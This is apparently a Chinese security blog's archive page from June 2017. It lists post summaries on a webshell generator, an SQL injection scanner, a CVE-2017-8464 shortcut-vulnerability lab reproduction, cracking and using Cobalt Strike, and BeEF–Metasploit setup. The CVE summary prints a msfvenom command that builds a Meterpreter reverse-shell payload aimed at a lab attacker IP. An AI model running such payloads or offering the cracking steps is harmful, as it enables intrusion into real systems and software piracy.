2017年6月19日

webshell 生成工具 b374k

摘要: 还在为不会写webshell而感到心累?还在为webshell有后而不敢用?? b374k,我们首先去github下载b374k https://github.com/b374k/b374k.git 在扔进虚拟机 kali,当然你也可以直接在里面下 进入目录运行index.php 运行方式 php 阅读全文

posted @ 2017-06-19 17:17 东京$ 阅读(2991) 评论(0) 推荐(0) 编辑

c/s与b/s 动态网站与静态网站 (网站编码统一“UTF-8”)

摘要: 1.c/s和b/s 第一张图是b/s 可以随时随地的浏览 (在服务器增加网页就能增加功能,只要改变网页就能使用户同步更新,共享性也强,开发也简单,在广域网和局域网都能建造b/s结构,然后通过internet来下载数据库的,应用,他是高位开发,他能实现在不同的地点,不同的人,不同的连接方式,来访问服务 阅读全文

posted @ 2017-06-19 16:20 东京$ 阅读(925) 评论(0) 推荐(0) 编辑

RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具

摘要: 无事早上就去逛freebuf看到一款不错的工具,打算介绍给大家 RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具 RED HAWK 最新版本:v1.0.0【2017年6月11日】 下载地址:【GitHub传送门】 RED HAWK的功能 1. 服务器检测 2. Cloudflare 阅读全文

posted @ 2017-06-19 09:36 东京$ 阅读(663) 评论(0) 推荐(0) 编辑

2017年6月18日

CVE-2017-8464复现 (远程快捷方式漏洞)

摘要: 我们的攻击机IP是192.168.222.133 目标机IP是192.168.222.132 我们首先生成一个powershell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f p 阅读全文

posted @ 2017-06-18 11:20 东京$ 阅读(4187) 评论(0) 推荐(0) 编辑

2017年6月17日

cobaltstrike安装加破解教程+使用教程

摘要: 1.先安装java环境= = 1. 下载1.8u121的JAVA JDK (新的java JDK不稳定)!!原因:https://blog.cobaltstrike.com/2017/04/26/java-startup-bug-in-java-1-8u131/ (即使你安装了新的也没关系接下来你就 阅读全文

posted @ 2017-06-17 17:26 东京$ 阅读(30984) 评论(6) 推荐(0) 编辑

2017年6月16日

漏洞银行 大咖连线笔记

摘要: 挖洞要分析抓到的包 注意源码里面的隐藏链接 1.SQL注入 分为3种类型 cookie,注入,post注入,get注入 sql注入是owasp top 排名前3的漏洞, sql是设计逻辑上的漏洞,没有过滤表单提交或页面提交数据夹杂着SQL语句,导致数据库受到攻击,数据被窃取 预防sql注入:过滤,储 阅读全文

posted @ 2017-06-16 21:53 东京$ 阅读(719) 评论(0) 推荐(0) 编辑

python写一个网页翻译器

摘要: import urllib.requesturl='https://fanyi.baidu.com/v2transapi'data={}data['i']=opdata['from']='AUTO'data['to']='AUTO'data['smartresult']='dict'data['cl 阅读全文

posted @ 2017-06-16 11:22 东京$ 阅读(623) 评论(0) 推荐(0) 编辑

2017年6月15日

利用python写一个简单的小爬虫 爬虫日记(1)(好好学习)

摘要: 打开py的IDLE >>>import urllib.request >>>a=urllib.request.urlopen("http://www.baidu.com") >>>html=a.read().decode("utf-8") >>>print(html) 结果: 阅读全文

posted @ 2017-06-15 11:17 东京$ 阅读(344) 评论(0) 推荐(0) 编辑

2017年6月13日

metasploit联动beef启动

摘要: (温馨提示:请按照步骤来,否则beef到后面会启动不了) 我们首先进入vim /usr/share/beef-xss/config.yaml 找到metasploit把它改为启动 把false改为true :wq!保存退出 进入beef下的extensions/metasploit目录,并用vim打 阅读全文

posted @ 2017-06-13 16:10 东京$ 阅读(1180) 评论(0) 推荐(0) 编辑

meterpreter_paranoid_mode.sh允许用户安全上演/无级连接Meterpreter经检查合格证书的处理程序正在连接到

摘要: 刚刚看完即刻安全大咖的新姿势感觉很6逼,结果成功了meterpreter_paranoid_mode.sh允许用户安全上演/无级连接Meterpreter经检查合格证书的处理程序正在连接到。 我们开始通过PEM格式的证书生成,一旦证书有我们可以创建一个HTTP或HTTPS或EXE有效载荷,并给予它是 阅读全文

posted @ 2017-06-13 10:41 东京$ 阅读(694) 评论(0) 推荐(0) 编辑

导航